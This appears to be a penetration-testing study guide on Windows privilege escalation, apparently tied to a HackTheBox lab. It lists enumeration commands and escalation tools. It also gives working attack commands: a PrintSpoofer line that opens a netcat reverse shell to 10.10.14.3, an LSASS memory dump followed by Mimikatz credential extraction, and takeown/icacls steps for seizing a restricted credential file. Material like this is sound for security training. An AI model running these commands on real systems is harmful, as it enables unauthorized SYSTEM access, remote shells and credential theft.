Windows Privilege Escalation (TBC)

Introduction

• Elevating privileges on a Windows system is a crucial step after gaining initial access. By moving from a low-privilege account to one with administrative rights or even SYSTEM-level access, you open the door to persistence, deeper network reconnaissance, and further lateral movement.

• The general goal of Windows privilege escalation is gain the privilege of the Local Administrators group or the NT AUTHORITY\SYSTEM LocalSystem account.

• While there are many tools available, it’s always important to understand what they do and how to manually verify their output. Tools can provide a huge amount of data. While they speed up the process, take time to interpret the output to avoid information overload. Examples of the tools we can use:

  • Seatbelt

  • winPEAS

  • PowerUp/SharpUp (C# version of PowerUp)

  • JAWS

  • SessionGopher

  • Watson

  • LaZagne

  • Windows Exploit Suggester - Next Generation

  • Sysinternals Suite

When you gain access, you might not have many writable directories. A reliable location to upload your tools is: C:\Windows\Temp

Initial Enumeration

• Begin your assessment by collecting key system details:

• Operating System & Version: Identify whether you’re dealing with a workstation or server (e.g., Windows 7, Windows 10, Server 2008, 2012, 2016, 2019, etc.). Knowing the OS type and version can guide your choice of tools and hint towards potential public exploits.

• Running Services: Investigate services, especially those running as NT AUTHORITY\SYSTEM or with administrative privileges. Misconfigured or vulnerable services can be prime targets.

• Environment Variables: Use the set command to print the current environment variables. These can reveal configuration details and potential weaknesses.

• Installed Programs & Running Processes: Processes running on the system, even if not running as an administrator, might have tokens that can be abused for privilege escalation.

Named Pipes

• Named pipes are a common method for inter-process communication. Since they reside in memory, their permissions and usage can offer clues for further escalation:

  • Using Sysinternals:

  pipelist.exe /accepteula

  • Using PowerShell:

  gci \\.\pipe\

• After listing the pipes, check specific permissions (for example, on the LSASS pipe) with:

accesschk.exe /accepteula \\.\Pipe\lsass -v

Network & System Information

• Another essential thing is understanding your target environment. Start by gathering basic network and system details:

  • Network Configuration:

    • ipconfig /all

    • arp -a

    • route print

  • Security Services: Check if Microsoft Defender is active or if AppLocker is enforcing policies to understand what you are permitted and not permitted to do:

    Get-MpComputerStatus
    Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Gathering User & Group Information

• Collecting detailed user and group data helps in mapping out the system’s security posture. Useful commands include:

  • Processes & Environment:

    tasklist /svc
    set
    systeminfo

• Hotfixes:

  • CMD: wmic qfe

  • PowerShell: Get-HotFix | ft -AutoSize

• Installed Programs:

  • CMD: wmic product get name

  • PowerShell: Get-WmiObject -Class Win32_Product | select Name, Version

• Network Services & User Details:

  netstat -ano # List Network Services
  query user # List Online Users
  echo %USERNAME% # Display the Current Username
  whoami /priv # List Privileges of the Current User
  whoami /groups # List Groups of the Current User
  net user # List Users
  net localgroup # List Members
  net localgroup administrators # List Group Members
  net accounts # List Account & Password Policies

Windows Privileges

• Privileges in Windows define what actions an account can perform. Every security principal (users, computers, processes) is identified by a unique SID.

• Every process in Windows runs with an access token that details the security context of the process. These tokens, although stored in memory, can sometimes be exploited, especially if they have privileges like SeImpersonate.

• Sometimes, certain privileges may be assigned but disabled. In such cases, PowerShell scripts, PoCs can be found online, can help you enable these privileges, ensuring you can leverage them during your escalation efforts.

Many administrative privileges are only visible in an elevated session. Rights displayed in a non-elevated console vs. an elevated console will differ drastically.

SeImpersonate & SeAssignPrimaryToken

• The SeImpersonate privilege allows a process to assume the security context of another user. Attackers can leverage this "Potato style" technique to gain SYSTEM-level access by tricking a privileged process into passing its token.

• Common Tools:

  • JuicyPotato (May not work on modern servers)

  • PrintSpoofer

  PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

SeDebugPrivilege

• The SeDebugPrivilege lets a user debug and access the memory of processes, such as LSASS, which holds user credentials.

• Memory Dumping:

  • Use ProcDump from the Sysinternals Suite to dump LSASS memory:

    whoami /priv # Check for SeDebugPrivilege
    procdump.exe -accepteula -ma lsass.exe lsass.dmp # Dumps the Lsass

• Extracting Credentials with Mimikatz:

  • Launch Mimikatz and run:

    mimikatz # log
    mimikatz # sekurlsa::minidump lsass.dmp
    mimikatz # sekurlsa::logonpasswords

Redirect Mimikatz output to a text file by typing “log” to ensure all output is saved, especially useful when handling many credentials.

• In cases where tool uploads are limited, you might use RDP and Task Manager to generate process dumps using the GUI.

SeTakeOwnershipPrivilege

• This privilege allows you to take ownership of any securable object such as files, registry keys, and services. This is particularly useful if you encounter files or objects with restricted access.

• Example Scenario:

  • Suppose you find a file cred.txt under a restricted share and lack access. First, check its details:

    Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname, LastWriteTime, Attributes, @{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

  • Then, take ownership:

    takeown /f 'C:\Department Shares\Private\IT\cred.txt'

  • Finally, grant yourself full access:

    icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

Changing ownership and permissions can disrupt system functionality. Always ensure you have proper authorization and understand the potential impact of these actions.